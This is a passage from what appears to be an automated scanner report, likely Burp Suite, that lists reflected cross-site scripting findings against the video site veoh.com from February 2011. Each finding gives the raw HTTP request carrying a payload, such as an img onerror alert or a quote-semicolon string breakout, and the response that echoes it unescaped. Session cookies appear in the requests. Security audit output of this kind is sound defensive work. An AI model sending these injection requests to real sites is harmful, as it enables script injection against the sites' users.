Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 77710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea>
...[SNIP]...

1.5. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=72
Content-Length: 94329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'd18561bc886031d73754768a00e1c177',
'v18647177dJ8p2YBEcfc58';c01f25840e4'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.6. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=43
Content-Length: 76768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected">
...[SNIP]...

1.7. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=20
Content-Length: 76724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea>
...[SNIP]...

1.8. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:44 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'aca1ab27744967658c549c7be43411a8',
'v189741093prNNZM522732';900f2443f83'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.9. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected">
...[SNIP]...

1.10. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea>
...[SNIP]...

1.11. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'088ee77b63d79318cd9540d1099eeade',
'v18978294NGnK88j8c6a1e';1b1f85b69a1'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.12. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected">
...[SNIP]...

1.13. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 76407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea>
...[SNIP]...

1.14. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=35
Content-Length: 94943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'1757659a2efcb124c29be93d82aed870',
'v18978294NGnK88j83a478';93eafa27de4'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.15. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea>
...[SNIP]...

1.16. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

